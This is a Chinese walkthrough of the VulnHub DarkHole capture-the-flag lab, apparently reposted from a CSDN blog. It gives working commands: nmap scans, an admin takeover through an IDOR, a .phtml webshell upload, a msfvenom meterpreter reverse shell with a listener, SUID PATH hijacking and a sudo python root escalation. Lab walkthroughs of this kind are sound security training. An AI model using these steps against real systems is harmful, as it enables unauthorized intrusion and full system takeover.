1.靶机部署

kali安装：https://blog.csdn.net/l2872253606/article/details/123592717?spm=1001.2014.3001.5502
靶机下载：https://download.vulnhub.com/darkhole/DarkHole.zip
得到三个文件，稍后需要打开的shi.ovf的文件：

使用VMware打开该文件：

设置好名称和虚拟机位置：
注意：导入过程中可能会提示导入失败，点击重试即可。

虚拟机的基本设置：

导入成功，打开虚拟机，到此虚拟机部署完成！

注意：靶机的网络连接模式必须和kali一直，让DC靶机跟kali处于同一网段，这用kali才能扫出DC的主机。

2.信息收集

2.1 探测IP

使用nmap扫描同一个段下存活的IP

nmap 192.168.11.0/24

发现155开启了80端口，通过访问确实是我们的靶机！

2.2 详细信息扫描

使用nmap对靶机开放的端口进行更详细的扫描：

nmap -A -T4 -p- 192.168.11.155

2.3 敏感目录

dirsearch -u 192.168.11.155 -e *

2.4 指纹收集

whatweb -v 192.168.11.155

3.渗透过程

拿到这么一个网站，暂时没有多余的线索，只有个登录页面：

3.1 注册账号

暴力破解不太现实，可以尝试一下注册个账号：

分别输入用户名，邮箱，密码：

3.2 登录网站

然后使用我们注册的用户登录：

3.3 越权操作

3.3.1 文件上传

这里我们使用bp抓包，修改id的值为1，然后提交数据试试：
不会bp抓包？建议先去学学BurpSuite使用和浏览器代理

这里我们停下来想想，id=2是我们新建的用户，那么id=1呢，是不是系统本来就有的账户，更疯狂点是不是管理员？
带着我们刚刚的猜测，实践一下，我们刚刚提交的密码是111，然后重新登录，用户名就猜测一下admin吧！、
登录成功！！！

发现相比普通用户，多了一个文件上传功能：那我们上传一个php一句话木马试试：

发现报错了，人家对后缀名有要求，那就只能换一种方式了，现在有两中方案：

• 1.改一个人家允许的后缀名，然后使用bp抓包改回来
• 2.上传一个比较冷梦的后缀名，又不影响程序运行，例如phtml

大道至简，先上传一个phtml的php文件试试，
phtml解释：
创建文件：

上传文件：

3.3.2 蚁剑连接

3.4 反弹shell

3.4.1 生成php反弹shell脚本：

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.11.128 lpor=4444 -o msfshell.php

3.4.2 开启ftp服务，靶机端下载

开启ftp服务：

python3 -m http.server 80

在靶机的upload文件夹下载：

3.4.3 kali端开启msf监听

开启msf，使用模块，设置参数和载荷：

use exploit/multi/handler
set lhost 192.168.11.128
set lport 4444
set payload php/meterpreter/reverse_tcp

设置完成后，查看设置：

show options

开启监听：

run

访问shell文件触发监听：

http://192.168.11.155//upload/msfshell.php

进入shell，并生成一个交互式shell：

shell
python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

3.5 提权

查看敏感文件之后发现有两个用户：

cat /etc/passwd | grep /bin/bash

经过一番搜索，在john的家目录发现一个叫toto的文件，具有SUID权限，其作用是输出id：

既然如此，我们能不能修改一下环境变量，让他执行id命令的时候打开一个john的bash：

echo "/bin/bash" > /tmp/idchmod 777 /tmp/idexport PATH=/tmp:$PATH./toto

拿到john的权限之后，查看john的家目录，找到了密码：

查看john的权限：
这里需要输入密码

sudo -l

发现john可以以root的身份执行file这个python文件：

在file.py里面写一段打开shell的代码，再以root的身份执行：

echo “import pty;pty.spawn(‘/bin/bash’)” > file.py
sudo python3 /home/john/file.py

成功拿到root权限！！！

夺旗！！！

实话说，这个旗子抱看。

来源地址：https://blog.csdn.net/MRS_jianai/article/details/128497960